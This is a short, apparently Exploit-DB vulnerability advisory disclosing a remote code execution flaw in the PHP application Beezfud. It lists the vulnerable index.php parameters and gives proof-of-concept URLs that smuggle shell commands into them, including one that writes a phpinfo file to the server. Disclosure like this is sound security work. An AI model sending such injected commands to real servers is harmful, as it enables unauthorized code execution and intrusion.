Beezfud - Remote Code Execution

EDB-ID:

39093

CVE:



Platform:

PHP

Date:

2015-12-24


================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php

# PoC :

http://localhost/beezfud/index.php?parameter=;Command;

Vulnerable Parameters : lookback , max , range , latest , earliest


Example :

http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
?>' >info.php;

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================